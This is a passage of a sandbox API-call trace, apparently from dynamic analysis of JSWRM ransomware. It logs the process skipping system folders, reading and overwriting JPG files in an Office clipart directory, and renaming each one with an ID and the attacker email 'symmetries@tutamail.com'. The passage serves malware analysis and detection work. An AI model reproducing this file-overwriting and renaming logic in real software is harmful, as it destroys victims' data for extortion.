(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0090.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0090.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382968.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.511] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=112479) returned 1 [0090.511] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b750) returned 0x24d210 [0090.512] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1b750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1b750, lpOverlapped=0x0) returned 1 [0090.557] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.557] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1b750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1b750, lpOverlapped=0x0) returned 1 [0090.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.559] CloseHandle (hObject=0x314) returned 1 [0090.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0090.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0090.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0090.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0090.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0090.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0090.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0090.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0090.560] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382968.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382968.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382968.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0090.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0090.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0090.562] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ebbf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4ebbf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4ebbf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1779f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382969.JPG", cAlternateFileName="")) returned 1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2=".") returned 1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2="..") returned 1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2="...") returned 1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2="windows") returned -1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2="recovery") returned -1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2="perflogs") returned -1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2="documents and settings") returned 1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2="system volume information") returned -1 [0090.562] lstrcmpiW (lpString1="J0382969.JPG", lpString2="msocache") returned -1 [0090.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0090.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382969.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382969.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382969.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0090.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0090.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382969.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382969.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382969.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0090.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0090.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0090.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0090.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382969.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.563] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=96159) returned 1 [0090.563] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17790) returned 0x24d210 [0090.566] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x17790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x17790, lpOverlapped=0x0) returned 1 [0090.574] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.574] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x17790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x17790, lpOverlapped=0x0) returned 1 [0090.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.575] CloseHandle (hObject=0x314) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0090.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0090.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0090.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0090.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0090.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0090.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.576] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382969.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382969.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382969.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0090.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0090.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0090.577] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ebbf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4ebbf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4ebbf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15b94, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382970.JPG", cAlternateFileName="")) returned 1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2=".") returned 1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2="..") returned 1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2="...") returned 1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2="windows") returned -1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2="recovery") returned -1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2="perflogs") returned -1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2="documents and settings") returned 1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2="system volume information") returned -1 [0090.577] lstrcmpiW (lpString1="J0382970.JPG", lpString2="msocache") returned -1 [0090.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0090.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382970.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382970.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382970.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0090.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0090.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382970.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382970.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382970.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0090.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0090.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0090.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0090.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382970.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.578] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=88980) returned 1 [0090.578] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15b90) returned 0x24d210 [0090.579] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x15b90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x15b90, lpOverlapped=0x0) returned 1 [0090.587] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.587] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x15b90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x15b90, lpOverlapped=0x0) returned 1 [0090.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.588] CloseHandle (hObject=0x314) returned 1 [0090.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0090.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0090.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0090.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0090.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0090.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0090.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382970.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382970.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382970.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0090.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0090.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0090.590] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ebbf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4ebbf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4ebbf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x190e9, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0384862.JPG", cAlternateFileName="")) returned 1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2=".") returned 1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2="..") returned 1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2="...") returned 1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2="windows") returned -1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2="recovery") returned -1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2="perflogs") returned -1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2="documents and settings") returned 1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2="system volume information") returned -1 [0090.590] lstrcmpiW (lpString1="J0384862.JPG", lpString2="msocache") returned -1 [0090.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0090.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384862.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384862.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384862.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0090.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0090.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384862.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384862.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384862.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0090.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0090.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0090.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0090.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384862.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384862.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.591] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=102633) returned 1 [0090.591] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x190e0) returned 0x24d210 [0090.592] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x190e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x190e0, lpOverlapped=0x0) returned 1 [0090.641] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.641] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x190e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x190e0, lpOverlapped=0x0) returned 1 [0090.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 